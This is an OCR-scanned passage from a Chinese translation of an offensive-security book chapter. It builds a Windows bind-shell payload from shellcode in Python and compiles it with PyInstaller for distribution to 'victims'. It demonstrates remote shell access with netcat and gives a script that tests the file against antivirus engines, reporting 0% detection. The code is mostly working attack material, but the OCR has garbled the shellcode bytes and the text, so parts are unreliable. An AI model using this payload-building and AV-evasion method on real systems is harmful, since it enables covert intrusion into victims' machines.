变量 存储 我 们 的 shellcode 之 后 ， 我 们 简单 的 把 它 作为 一 个 函数 并 执行 他 ， 作 为 未 
来 的 参考 ， 我 们 保存 这 个 文件 为 bindshell.py 。 


from ctypes import * 
shellcode = 


("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8bD\x52\x30' 
"\xX8b\x52\xOC\x8b\xX52\xX14\xX8D\X72\xX28\xOF\xb7\x4a\x26\X31\x FF" 
"\xX31\xcO\xac\x3c\x61\x7C\x02\x2c\x20\xc1\xcf\xOd\x01\xc7\xe2" 
"\XFO\x52\x57\x8b\x52\x10\x8b\x42\x3c\xO1\xdO\x8b\x40\x78\x85" 
"\xcO\xX74\x4a\xO1\xdO\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3" 
"\X3C\x49\x8D\x34\x8b\xO1\xd6\x31\xFF\x31\xcO\xac\xci\xcf\x0d" 
"\XO1\xc7\x38\xeO\X75\xXF4\xXO3\x7d\xF8\xX3b\x7d\x24\x75\xe2\x58" 
"\X8b\x58\x24\x01\xd3\x66\x8b\xOCc\x4b\x8b\x58\x1c\xO1\xd3\x8b" 
"\X04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" 
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68" 
"\X77\X73\X32\X5F\X54\X68\X4C\X7 7\X26\XO7\xFF\xd5\xb8\x90\x01" 
"\xXOO\xOO\x29\xc4\x54\x50\xX68\X29\x80\x6D\xOO\xFF\xd5\x50\x50" 
"\x50\x50\x40\x50\x40\x50\x68\xea\xOF\xdF\xeO\xfF\xd5\x89\xc7" 
"\X31\xdb\x53\x68\x02\x00\xXO05\x39\x89\xe6\x6a\xLO\x56\xX57\x68" 
"\xc2\xdb\x37\x67\xf F\xd5\x53\x57\x68\xb7\xe9\x38\xXFFI\XFF\xd5" 
"\X53\x53\x57\x68\x74\xec\x3b\xe1\xfF\xd5\x57\x89\xc7\x68\x75" 
"\x6e\x4d\x61\xfF\xd5\x68\x63\x6d\x64\x00\x89\xe3\xX57\X57\x57" 
"\X31\xF6\x6a\x12\x59\x56\xe2\xFd\x66\xXCc7\x44\x24\x3c\xO1\x01" 
"\X8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\xX56\x56\x46\x56\x4e" 
"\xX56\x56\x53\x56\x68\xX79\xcc\xX3F\xX86\ xf F\xd5\x89\xeO\x4e\x56" 
"\X46\xFF\X30\x68\xX08\xX87\x1d\x60\xFF\xd5\xbb\xFO\xb5\xa2\x56" 
"\x68\xa6\x95\xbd\x9d\xfF\xd5\x3c\xO6\x7c\x0a\x80\xfb\xeO\x75" 
"\XO5\xbb\x47\x13\x72\x6F\x6a\xOO\x53\xFF\xd5"); 


memorywithshell = create_string_buffer(shellcode, len(shellcode) ) 
shell = cast(memorywithshell, CFUNCTYPE(c_void_p) ) 
shell() 


Ay 





而 此 时 的 脚本 将 会 在 装 有 Python 解释 器 的 Windows 上 执行 ， 让 我 们 通过 
Pyinstaller 编译 软件 提高 它 。( 可 以 从 http://www.pyinstaller.org/ 获得 )。Pyinstaller 
将 Python 脚本 编译 为 独立 的 可 执行 程序 ， 可 以 分 发 给 没有 安装 Python 解释 器 的 系 
统 使 用 。 在 编译 脚本 之 前 ， 运 行 Configure.py AZ <€Pyinstaller 很 重要 。 


Microsoft Windows [Version 6.0.6000] 

Copyright (c) 2006 Microsoft Corporation. All rights reserved. 
C:\Users\victim>cd pyinstaller-1.5.1 
C:\Users\victim\pyinstaller-1.5.1>python.exe Configure. py 


I: read old config from config.dat 
computing EXE_dependencies 
Finding TCL/TK... 

. SNIPPED. .> 

testing for UPX... 

...UPX unavailable 

computing PYZ dependencies... 
done generating config.dat 


FF AHH 


接 下 来 ， 我 们 将 指导 Pyinstaller 建立 一 个 说 明文 件 为 Windows 的 可 执行 文件 做 准 
备 ， 我 们 将 指示 Pyinstaller 不 显示 一 个 控制 台 用 --noconsole 选项 ， 最 终 构建 一 
个 最 终 的 可 执行 程序 到 一 个 单独 的 文件 用 --onefile 选项 。 


C:\Users\victim\pyinstaller-1.5.1>python.exe Makespec.py --onefile 
wrote C:\Users\victim\pyinstaller-1.5.1\bindshell\bindshell.spec 
now run Build.py to build the executable 


‘ = 





接 下 来 ， 建 立 了 说 明文 件 后 ， 我 们 将 指示 Pyinstaller 建立 一 个 可 执行 文件 分 发 给 我 
们 的 受害 者 。Pyinstaller 创建 一 个 名 为 bindshell.exe 的 可 执行 程序 在 目 

K bindshell\dist\、 下 ， 我 们 现在 可 以 分 发 这 个 可 执行 程序 给 任何 Windows 32 
位 系统 的 受害 者 。 





C:\Users\victim\pyinstaller-1.5.1>python.exe Build.py bindshell\bir 
I: Dependent assemblies of C:\Python27\python.exe: 

I: x86_Microsoft.VC90.CRT_ifc8b3b9a1e18e3b_9.0.21022.8 none 
checking Analysis 

<..SNIPPED. ,> 

checking EXE 

rebuilding outEXE2.toc because bindshell.exe missing 

building EXE from outEXE2.toc 

Appending archive to EXE bindshell\dist\bindshell.exe 





在 我 们 的 受害 者 的 电脑 上 运行 可 执行 程序 后 ， 我 们 可 以 看 到 TCP 91337 端口 正在 
监听 “。 


C:\Users\victim\pyinstaller-1.5.1\bindshell\dist>bindshell.exe 
C:\Users\victim\pyinstaller-1.5.1\bindshell\dist>netstat -anp TCP 
Active Connections 


Proto Local Address oreign Address State 
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 

TCP 0.0.0.0:1337 0.0.0.0:0 LISTENING 

TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 
TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 
TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING 
TCP 0.0.0.0:49156 0.0.0.0:0 LISTENING 
TCP 0.0.0.0:49157 0.0.0.0:0 LISTENING 


EE Sea 


连接 到 受害 者 的 IP 地 址 和 TCP 的 1337 3H > RMA AKIN E 意 软件 正在 成 功 的 
运行 ， 正 如 预期 的 那样 。 但 是 它 能 成 功 的 躲避 杀毒 软件 码 ? 在 下 一 节 我 们 将 编写 
个 Python 脚本 来 验证 : 


attacker$ nc 192.168.95.148 1337 

Microsoft Windows [Version 6.0.6000] 

Copyright (c) 2006 Microsoft Corporation. All rights reserved. 
C:\Users\victim\pyinstaller-1.5.1\bindshell\dist> 


验证 躲避 


我 们 将 使 用 服务 vscan.novirusthanks.org 扫描 我 们 的 可 执行 程序 。 
NoVirusThanks 提供 了 一 个 WEB 页 面 接口 上 传 可 疑 文 件 并 用 14 种 不 同 的 杀毒 引擎 
扫描 。 使 用 WEB 页 面 接口 上 传 恶 意 文件 时 可 以 告诉 我 们 我 们 想 知 道 的 ， 让 我 们 利 
用 这 个 机 会 编写 一 个 快速 的 Python 脚本 来 自动 化 处 理 这 个 过 程 。 用 tcpdump 捕获 
和 WEB 页 面 接口 交互 的 过 程 给 了 我 们 的 Python 脚本 的 一 个 很 好 的 开始 点 。 我 么 可 
以 看 到 ，HTTP 头 包 含 了 一 个 围绕 文件 内 容 边 界 的 设 定 。 我 们 的 脚本 需要 这 些 头 和 
这 些 参数 ， 为 了 提交 文件 : 


POST / HTTP/1.1 

Host: vscan.novirusthanks.org 

Content-Type: multipart/form-data; boundary=- - --webKitFormBoundarylt 
Referer: http://vscan.novirusthanks.org/ 

Accept-Language: en-us 

Accept-Encoding: gzip, deflate------- WebKitFormBoundar yF17rwCZdGuPl 
Content-Disposition: form-data; name="upfile"; filename="bindshell.« 
Content-Type: application/octet-stream 

<..SNIPPED FILE CONTENTS. .> 

------ WebKitFormBoundaryF17rwCZdGuPNPT9U 

Content-Disposition: form-data; name="submitfile" 

Submit File 

------ WebKit FormBoundaryF17rwCZdGuPNPT9U- - 





我 们 现在 要 利用 httplib 编写 一 个 快速 的 函数 将 文件 名 作为 参数 。 打 开 文 件 后 读 
取 内 容 ， 它 创建 了 一 个 到 vscan.novirusthanks.org 的 连接 并 提交 头 部 和 参 
数 。 页 面 返回 的 响应 指向 上 传 文件 的 分 析 内 容 页 面 。 


def uploadFile(fileName) : 
print("[+] Uploading file to NoVirusThanks...") 
fileContents = open(fileName, 'rb').read() 
header = {'Content-Type': 'multipart/form-data; boundary=- --- 
WebKitFormBoundaryF17rwCZdGuPNPT9U' } 
params = "------ WebKitFormBoundaryF17rwCZdGuPNPT9U" 
params += "\r\nContent-Disposition: form-data;"+"name=\"upfile’ 
params += "\r\nContent-Type: "+"application/octetstream\r\n\r\r 
params += fileContents 
params += "\r\n------ WebKitFormBoundaryF17 rwCZdGuPNPT9U" 
params += "\r\nContent-Disposition: form-data;"+"name=\"submiti 
params += "\r\nSubmit File\r\n" 
params +="------ WebKitFormBoundar yF17 rwCZdGuPNPT9U- -\r\n" 
conn = httplib.HTTPConnection('vscan.novirusthanks.org' ) 
conn.request("POST", "/", params, header) 
response = conn.getresponse() 
location = response.getheader('location' ) 
conn.close() 
return location 


[E SS SS 


检查 从 vscan.novirusthanks.org ,服务 器 返回 的 定位 字段 ， 我 们 可 以 看 到 服 

器 返回 的 构建 页 面 来 

Á : http://vscan.novirusthanks.org +/file/ + md5sum(filecontents) + 
。 该 页 面包 含 了 一 些 JavaScript 来 打印 一 些 消息 说 正在 扫描 和 加 载 页 面 直 到 完整 的 
分 析 页 面 准 备 好 。 在 这 一 点 上 ， 页 面 返回 HTTP 302 状态 码 ， 跳 转 

到 http://vscan.novirusthanks.org + /analysis/+md5sum(file contents) 


页 面 。 我 们 新 的 一 页 在 URL 中 简单 的 交换 了 分 析 的 文档 : 





| 


Date: Mon, 18 Jun 2012 16:45:48 GMT 
Server: Apache 
Location:http://vscan.novirusthanks.org/file/d5bb12e32840f4c3f ad06t 


a aes | 


纵 观 分 析 页 面 的 源 代码 ， eee 
些 CSS 代码 ， 我 们 需要 将 它 剥 离 出 来 并 打印 在 控 古 





File Info 

Report date: 2012-06-18 18:48:20 (GMT 1) 

File name: [b]bindshell-exe[/b] 

File size: 73802 bytes 

MD5 Hash: d5bb12e32840f4c3fa00662e412a66fFec 

SHA1 Hash: e9309c2bb3f369dfbbd9b42deaf 7c 7ee5c29e364 

Detection rate: [color=red]0[/color] on 14 ([color=red]0%[/color] ) 


4 a: C 








在 了 解 了 如 何 连 接 分 析 页 面 并 剥离 CSS 代码 ， 我 们 可 以 编 ae ee 脚本 打印 我 们 
上 传 的 可 疑 文件 的 扫描 结果 。 首 先 ， 我 们 的 脚本 连接 到 返回 扫描 消息 的 文件 页 面 ， 
ee hey 分 析 页 面 ， 我 们 可 以 使 用 正则 表 
达 式 读 取 检 测 率 然后 替换 CSS 代码 为 空 字符 串 。 我 们 将 打印 处 检 测 率 字 符 串 到 屏 
RE: 


def printResults(url): 
status = 200 
host = urlparse(url)[1] 
path = urlparse(url)[2] 
if 'analysis' not in path: 
while status != 302: 
conn = httplib.HTTPConnection(host ) 
conn.request('GET', path) 
resp = conn.getresponse() 
status = resp.status 
print('[+] Scanning file...') 
conn.close() 
time.sleep(15) 
print('[+] Scan Complete. ') 
path = path.replace('file', 'analysis') 
conn = httplib.HTTPConnection(host) 
conn.request('GET', path) 
resp = conn.getresponse() 
data = resp.read() 
conn.close() 
reResults = re.findall(r'Detection rate:.*\) ', data) 
htmlStripRes = reResults[1].replace('&lt;font color=\'red\'&gt, 
print('[+] ' + str(htmlStripRes) ) 


ee 


添加 一 些 选项 的 解析 ， 我 们 现在 有 一 个 脚本 能 够 上 传 文件 ， 使 
用 vscan.novirusthanks.org 服务 扫描 它 ， 并 打印 检测 率 : 





import re 

import httplib 

import time 

import os 

import optparse 

from urlparse import urlparse 

def uploadFile(fileName): 
print("[+] Uploading file to NoVirusThanks...") 
fileContents = open(fileName, 'rb').read() 
header = {'Content-Type': 'multipart/form-data; boundary=- - - -We 
params = "------ WebKit FormBoundaryF17rwCZdGuPNPT9U" 
params += "\r\nContent-Disposition: form-data;"+"name=\"upfile* 
params += "\r\nContent-Type: "+"application/octet stream\r\n\r° 
params += fileContents 
params += "\r\n------ WebKitFormBoundar yF17rwCZdGuPNPT9U" 
params += "\r\nContent-Disposition: form-data;"+"name=\"submiti 


params += "\r\nSubmit File\r\n" 
params +="------ WebKitFormBoundaryF17rwCZdGuPNPT9U- -\r\n" 
conn = httplib.HTTPConnection('vscan.novirusthanks.org' ) 
conn.request("POST", "/", params, header) 
response = conn.getresponse( ) 
location = response.getheader('location' ) 
conn.close() 
return location 
def printResults(url): 
status = 200 
host = urlparse(url)[1] 
path = urlparse(url)[2] 
if 'analysis' not in path: 
while status != 302: 
conn = httplib.HTTPConnection(host ) 
conn.request('GET', path) 
resp = conn.getresponse() 
status = resp.status 
print('[+] Scanning file. ..") 
conn.close() 
time.sleep(15) 
print('[+] Scan Complete.') 
path = path.replace('file', 'analysis') 
conn = httplib.HTTPConnection(host ) 
conn.request('GET', path) 
resp = conn.getresponse() 
data = resp.read() 
conn.close() 
reResults = re.findall(r'Detection rate:.*\) ', data) 


htmlStripRes = reResults[1].replace('&lt;font color=\'red\'&gt, 


print('[+] ' + str(htmlStripRes) ) 
def main(): 
parser = optparse.OptionParser('usage%prog -f <filename>' ) 


parser.add_option('-f', dest='fileName', type='string', help=': 


(options, args) = parser.parse_args() 
fileName = options.fileName 


if fileName == None: 
print(parser.usage) 
exit(0) 


elif os.path.isfile(fileName) == False: 
print('[+] ' + fileName + ' does not exist.') 
exit(0) 

else: 
loc = uploadFile( fileName ) 
printResults(loc) 

if _name == '_ main_': 
main() 


4] = Be 





让 我 们 先 来 测试 一 个 已 知 的 恶意 软件 来 验证 杀毒 程序 是 否 能 成 功 的 检测 出 来 。 我 们 
将 建立 一 个 Windows TCP 48 shell 绑 定 TCP 的 1337 端口 。 使 用 Metasploit 默认 
的 编码 器 ， 我 们 将 编码 它 为 一 个 标准 的 Windows 可 执行 程序 。 注 意 结果 ， 我 们 能 看 


到 14 个 杀毒 引擎 中 有 10 个 检测 出 该 文件 是 恶意 的 ， 这 个 文件 很 明显 不 能 躲避 杀毒 
软件 的 检测 : 


attacker$ msfpayload windows/shell_bind_tcp LPORT=1337 X > bindshe- 
Created by msfpayload (http://www.metasploit.com). 
Payload: windows/shell_bind_tcp 

Length: 341 

Options: {"LPORT"=>"1337"} 

attacker$ python virusCheck.py -f bindshell.exe 
[+] Uploading file to NoVirusThanks... 

[+] Scanning file... 

[+] Scanning file... 

[+] Scanning file... 

[+] Scanning file... 

[+] Scanning file... 

[+] Scanning file... 

[+] Scanning file... 

[+] Scanning file... 

[+] Scanning file... 

[+] Scan Complete. 

[+] Detection rate: 10 on 14 (71%) 


4 话 
然而 ， 运 行 我 们 的 检测 脚本 针对 我 们 用 Python 脚本 编译 的 可 执行 程序 ， 我 们 可 以 看 


到 14 个 杀毒 引擎 都 检测 失败 。 成 功 ! 我 们 可 以 用 一 点 Python 完全 的 躲避 杀毒 引 
ak o 





C:\Users\victim\pyinstaller-1.5.1>python.exe virusCheck.py -f 
bindshell\dist\bindshell.exe 

[+] Uploading file to NoVirusThanks... 
[+] Scan Complete. 

[+] Scanning file... 

[+] Scanning file... 

[+] Scanning file... 

[+] Scanning file... 

[+] Scanning file... 

[+] Scanning file.. 

[+] Detection rate: 0 on 14 (0%) 


_ 立 - -2 
RE 总 结 


RE | 你 已 经 完成 了 最 后 一 章 ， 项 望 这 本 书 对 你 有 帮助 。 前 面 已 经 覆盖 了 各 种 不 同 
的 概念 。 从 如 何 编 写 一 些 Python 代 码 来 协助 网 络 测试 开始 ， 我 们 过 渡 到 为 法 庭 取 证 
分 析 ， 分 析 网 络 流量 ， 渗 透 测 试 无 线 网 络 ， 分 析 WEB 页 面 和 社交 平台 编写 代码 。 

在 最 后 一 章 解 释 了 一 个 编写 躲避 杀毒 引擎 扫描 的 程序 的 方法 。 看 完 本 书 之 后 ， 返回 
到 前 面 的 章节 。 你 可 以 怎样 修改 脚本 来 满足 你 特定 的 需求 ?你 怎么 让 他 们 更 有 效 ， 


局 


蜀 效 或 者 更 致命 ?例如 在 这 一 章 中 ， 你 可 以 使 用 编码 技术 编码 shellcode 来 躲避 


引擎 吗 ? 你 会 怎样 编写 今天 的 Python 程序 ? 对 于 这 些 想法 ， 我 们 给 你 一 些 亚 里 
德 的 智慧 名 言 : “We make war that we may live in peace.” 


